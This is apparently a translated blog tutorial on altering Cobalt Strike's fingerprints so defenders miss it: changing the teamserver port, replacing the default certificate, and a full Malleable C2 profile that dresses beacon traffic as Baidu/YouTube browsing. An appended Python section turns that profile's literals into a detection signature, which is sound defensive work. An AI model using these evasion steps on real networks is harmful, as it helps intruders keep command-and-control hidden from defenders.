Cobalt strike feature modification
2022-07-06 06:28:00 【zxl2605】
In red-versus-blue exercises, HVV and similar engagements, everyone uses Cobalt Strike, which also makes it a focus for security vendors. It is similar to msf, but CS is easier to operate than MSF and has a powerful plugin library. A red-team tool this common inevitably has entries in security products' signature libraries, so we need to modify its characteristics.
------ This article only looks at the characteristics of CS itself; it does not cover making the Trojan (payload) evade antivirus. I will write about AV evasion later. This is also a record of my own learning, and guidance is welcome.
1. CS default port
CS listens on port 50050 by default. When the blue team analyses an IP and sees 50050 open, they usually just block it, because it is obviously the CS port. So we need to change 50050.
Modify it in the teamserver file on the server:
vi teamserver
Change the 50050 at the bottom of the script to another port, and that is it.
2. CS https fingerprint: certificate modification
By default, without configuring a certificate for CS, it uses the certificate bundled with CS. Before discussing why it needs to be modified, let's look at the contents of the default certificate.
Open it with keytool.exe (it ships with any Java installation):
keytool -list -v -keystore cobaltstrike.store
You will be asked for a password; the default is 123456. If it is not 123456, open the teamserver file and look there.
Try it if you like, but the password does not really matter, because later we generate our own keystore anyway.
This is the original cobaltstrike.store file; everything in it is a CS signature, so using it as-is gets detected.
So at this point we need to generate the certificate ourselves.
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias SuanSuan -dname "CN=Suan Suan, OU=Suan, O=Suan, L=LongZu, S=OO, C=OO"
The parameters mean the following:
CN = common name (first and last name), OU = organizational unit, O = organization name, L = city or locality, ST = state or province, C = two-letter country code
Here cobaltstrike.store is the newly generated keystore file; -alias sets the alias, -storepass and -keypass set the keystore and key passwords, -keyalg RSA sets the key algorithm, and -dname sets the owner information.
With this information we can generate our own unique certificate, so that the characteristics of the previous certificate do not get us detected.
After generating the new certificate, delete the original one and put the new one in the CS root directory. The certificate then needs to be enabled:
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
cobaltstrike.store is the name of the keystore we generated.
Check it again with keytool:
keytool -list -v -keystore cobaltstrike.store
The certificate now shows the information we just set.
It is not fully effective yet, though; see the C2 configuration below.
3. Modifying the traffic characteristics of the CS http service
We generate a Trojan for an http listener and capture its traffic with wireshark to look at the details.
This capture shows CS's http packets without any modification. The request and response look odd: far too few parameters, and the User-Agent header is Internet Explorer's. Hardly anyone uses IE any more, so this needs to be modified as well.
Use a Malleable C2 Profile to customize the CS traffic characteristics.
References: https://github.com/xx0hcd/Malleable-C2-Profiles
Malleable Command and Control (helpsystems.com)
Configure a profile based on the template files:
###global options###
set sleeptime "37500"; # unit: ms
set jitter "35"; # sleep jitter, percentage 0-99
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69"; # custom User-Agent header
###SSL Options###
# If you already have a certificate, use the one you generated: uncomment this block and comment out the certificate-generation block below. If not, use the block below to generate one.
#https-certificate {
#set keystore "location of the .store file in the CS directory";
#set password "password of the .store certificate file";
#}
https-certificate {
set C "US"; # two-letter country code
set CN "Suan Suan"; # first and last name
set L "WU"; # city name
set O "Suan Suan"; # organization name
set OU "Suan Suan"; # organizational unit name
set ST "WU"; # state or province name
set validity "365"; # number of days the certificate is valid
}
###CODE-SIGNER BLOCK###
code-signer{
# Used to sign Windows Executable and Windows Executable(S) payloads, so that all payloads are consistent
set keystore "cobaltstrike.store"; # certificate file name
set password "123456"; # certificate password
set alias "baidu.com"; # certificate alias
}
###HTTP-GET Block###
http-get {
set uri "/video /knowledge /douga /cinephile"; # custom URI request paths, several of them separated by spaces
# request configuration
client {
header "referer" "https://www.baidu.com/";
header "Host" "https://youtube.com/";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
header "Connection" "close";
metadata {
netbiosu; # netbios (uppercase) encoding
append "BV1kF411J7zG?spm_id_from=333.5.0.0"; # append this suffix to the encoded content
parameter "file"; # put the content in a URI parameter with this name
prepend "v="; # prepend this prefix to the content
header "Cookie"; # put the content in the HTTP Cookie header
}
}
# response configuration
server {
header "Content-Type" "text/html; charset=utf-8";
header "content-encoding" "gzip";
header "set-cookie" "innersign=1; path=/; domain=.youtube.com/";
output {
base64;
print;
}
}
}
###HTTP-Post Block###
http-post {
set uri "/knowledge= /food="; # must not be exactly the same as the http-get URI paths
client {
header "Host" "https://youtube.com/";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
header "Connection" "close";
id {
netbios;
append "spm_id_from=333.5.0.0";
uri-append; # append to the end of the URI
}
output {
base64;
print;
}
}
server {
output {
base64;
print;
}
}
}
The profile above (written following the references above; it still has many unreasonable places) configures both http and https. The https part enables the certificate generated above, giving the certificate custom characteristics; the http part makes the transmitted packets look more authentic, which makes it harder for the blue team to trace the source.
Start the team server with the profile using the following command:
./teamserver 192.168.1.109 suan c2.profile
This is the normal CS start command with the profile file appended.
Now let's look at the http Trojan's packets again.
The packets have changed. Adjust the profile to your own situation to make the traffic look more authentic.
Then there is https. Let's look at the https service.
Now our certificate shows up. If there is no https configuration in the profile, the certificate information is not displayed and all the fields are empty.
4. Domain fronting
This technique is quite good: configure a CDN service so that the real IP cannot be traced and cannot be found. As a minor I cannot register a domain name, so I will add this part later.
Statement: the techniques, ideas and tools in this article are only for learning and exchange for security purposes. Nobody may use them for illegal purposes; otherwise you bear the consequences yourself!!!
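The flip side of the profile above: every literal it hardcodes (User-Agent, URI list, fixed headers, the prepend/append affixes) is sent verbatim in every beacon request, so a blue team can turn the profile itself into a signature. The following is an added example, not code from the post or from Cobalt Strike; it pulls those literals out of a constructed excerpt of the post's profile and matches them against constructed HTTP requests.

```python
import re

# Constructed excerpt of the post's profile: only the fields a network sensor can see.
PROFILE = r'''
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69";
http-get {
    set uri "/video /knowledge /douga /cinephile";
    client { header "referer" "https://www.baidu.com/"; header "Host" "https://youtube.com/";
             metadata { netbiosu; append "BV1kF411J7zG?spm_id_from=333.5.0.0"; prepend "v="; header "Cookie"; } }
}
http-post {
    set uri "/knowledge= /food=";
    client { id { netbios; append "spm_id_from=333.5.0.0"; uri-append; } }
}
'''

def extract_indicators(profile):
    # Collect the literal strings the profile hardcodes into every beacon request.
    ua = re.search(r'set useragent\s+"([^"]*)"', profile)
    ind = {"useragent": ua.group(1) if ua else None, "uris": set(), "headers": set()}
    for uris in re.findall(r'set uri\s+"([^"]*)"', profile):
        ind["uris"].update(uris.split())  # a profile lists several URIs separated by spaces
    for name, value in re.findall(r'header\s+"([^"]*)"\s+"([^"]*)"', profile):
        ind["headers"].add((name.lower(), value))  # fixed header/value pairs
    # prepend/append affixes go out verbatim; very short ones like "v=" are too common to be useful
    ind["literals"] = {s for s in re.findall(r'(?:prepend|append)\s+"([^"]*)"', profile)
                       if len(s) >= 6}
    return ind

def match_request(raw, ind):
    # Return the sorted kinds of indicator that a raw HTTP request text matches.
    lines = raw.split("\r\n")
    parts = lines[0].split(" ")
    path = parts[1] if len(parts) >= 2 else ""
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
    hits = set()
    if any(path.startswith(u) for u in ind["uris"]):
        hits.add("uri")
    if ind["useragent"] and headers.get("user-agent") == ind["useragent"]:
        hits.add("user-agent")
    hits.update("header:" + n for n, v in ind["headers"] if headers.get(n) == v)
    if any(lit in raw for lit in ind["literals"]):
        hits.add("literal")
    return sorted(hits)

# Constructed sample requests: one shaped by the profile above, one ordinary browser/curl request.
BEACON_REQUEST = ("GET /cinephile HTTP/1.1\r\nHost: https://youtube.com/\r\n"
                  "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69\r\n"
                  "Cookie: v=EBGHJKLMBV1kF411J7zG?spm_id_from=333.5.0.0\r\n\r\n")
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/8.0\r\n\r\n"
```

Running `match_request(BEACON_REQUEST, extract_indicators(PROFILE))` reports the uri, user-agent, host header and affix hits, while the benign request matches nothing; a single hit such as a common User-Agent is weak on its own, so a real detection should require several.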